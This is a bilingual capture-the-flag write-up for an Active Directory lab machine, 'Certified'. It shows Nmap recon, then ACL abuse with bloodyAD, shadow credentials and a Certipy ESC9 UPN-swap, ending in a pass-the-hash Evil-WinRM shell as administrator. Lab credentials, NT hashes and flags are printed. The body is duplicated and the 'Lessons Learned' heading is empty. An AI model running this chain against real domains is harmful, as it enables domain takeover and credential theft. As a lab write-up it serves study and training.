本文介绍了如何通过信息收集和漏洞分析,使用judith.mader用户进行特权升级和根权限获取。首先,通过Nmap扫描获取目标主机的信息,确认开放的端口和服务。接着,利用bloodhound-python工具收集域信息,并通过权限提升的手段将judith.mader用户添加到management组,获取更高的权限。最终,通过Certipy申请证书并成功以administrator身份进行身份验证,获取根权限。文章详细描述了每一步的执行过程和命令,展示了如何在Windows环境中进行渗透测试与权限提升。 This article explains how to achieve privilege escalation and obtain root privileges by using the judith.mader user through information gathering and vulnerability analysis. First, target host information is obtained via Nmap scanning to confirm open ports and services. Next, the bloodhound-python tool is used to collect domain information, and privilege escalation methods are employed to add the judith.mader user to the management group, gaining higher privileges. Finally, Certipy is used to request a certificate and successfully authenticate as the administrator, obtaining root privileges. The article details the execution process and commands for each step, demonstrating how to conduct penetration testing and privilege escalation in a Windows environment.

Information Gathering

# Nmap 7.98 scan initiated Fri Jan  2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-02T10:18:15
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 seconds

Vulnerability Analysis

judith.mader:judith09

首先校准时间

➜  Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan  2 10:29:36 AM UTC 2026

bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip 收集域信息

image

judith.mader user WriteOwner Management group GernericWrite Management_SVC user GenericAll CA_OPERATOR user

Exploitation (User Flag)

# 将management组的所有者改为用户judith.mader
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# 给judith.mader权限
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# 将judith.mader纳入该组
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# 使用 ldap 模块查询 judith.mader 所属的组
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"

此时我们就可以利用GernericWrite Management_SVC user

# 给用户Management_SVC设置虚假的SPN
➜  Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache

NT: a091c1832bcdd4677c28b5a6a1295584

Privilege Escalation (Root Flag)

➜  Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout

得到ESC9

更改upn为administrator

➜  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

申请证书

➜  Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

还原upn

➜  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'

进行身份验证

➜  Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
➜  Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769

Lessons Learned

Information Gathering

# Nmap 7.98 scan initiated Fri Jan  2 03:47:32 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.14s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-02 10:17:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-01-02T10:18:55+00:00; +6h29m39s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:04:20
| Not valid after:  2105-05-23T21:04:20
| MD5:     3b59 90a0 ed2e 5d54 1f81 c21d c0f0 1258
| SHA-1:   c77f 527a 24d3 9c55 fda8 fadf 269f 7958 9c88 baea
|_SHA-256: 22bd 6df5 0f09 901b a303 963f bd40 94fc a5fe e834 dec6 809c ba47 1f96 bd42 396e
|_ssl-date: 2026-01-02T10:18:56+00:00; +6h29m39s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/2%Time=69573FE9%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-01-02T10:18:15
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h29m38s, deviation: 0s, median: 6h29m38s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan  2 03:49:17 2026 -- 1 IP address (1 host up) scanned in 105.83 seconds

Vulnerability Analysis

judith.mader:judith09

First, calibrate the time

➜  Certified sudo date -s "$(nmap -p 445 10.10.11.41 --script smb2-time | grep 'date: 2'|cut -d ' ' -f 5)"
Fri Jan  2 10:29:36 AM UTC 2026

bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -dc 'dc01.certified.htb' -c all -ns 10.10.11.41 --zip Collect domain information

image

judith.mader user WriteOwner Management group GenericWrite Management_SVC user GenericAll CA_OPERATOR user

Exploitation (User Flag)

# Change the owner of the management group to user judith.mader
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' set owner 'management' judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
# Grant permissions to judith.mader
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add genericAll 'management' judith.mader
[+] judith.mader has now GenericAll on management
# Add judith.mader to the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' judith.mader
[+] judith.mader added to management
# Use the ldap module to query the groups that judith.mader belongs to
nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --query "(sAMAccountName=judith.mader)" "memberOf"

At this point, we can use GenericWrite on Management_SVC user

# Set a fake SPN for the user Management_SVC
➜  Certified bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p 'judith09' add shadowCredentials 'management_svc'
[+] KeyCredential generated with following sha256 of RSA key: 27e6dac6b3bf03d0ae9997665206b05b54de55bd629b95d8acd1f3e090c4248f
[+] TGT stored in ccache file management_svc_Df.ccache

NT: a091c1832bcdd4677c28b5a6a1295584

Privilege Escalation (Root Flag)

➜  Certified certipy find -u ca_operator@certified.htb -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -vulnerable -stdout

Obtained ESC9

Change UPN to administrator

➜  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'administrator' -user 'ca_operator' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

Request certificate

➜  Certified certipy req -u CA_OPERATOR -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.10.11.41 -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' -debug
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Restore UPN

➜  Certified certipy account -u 'management_svc' -hashes 'a091c1832bcdd4677c28b5a6a1295584' -dc-ip 10.10.11.41 -upn 'CA_OPERATOR@certified.htb' -user 'CA_OPERATOR' update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : CA_OPERATOR@certified.htb
[*] Successfully updated 'ca_operator'

Perform authentication

➜  Certified certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
➜  Certified evil-winrm -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -i certified.htb

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
25313f415eb17c6f9856e10e820d9769

Lessons Learned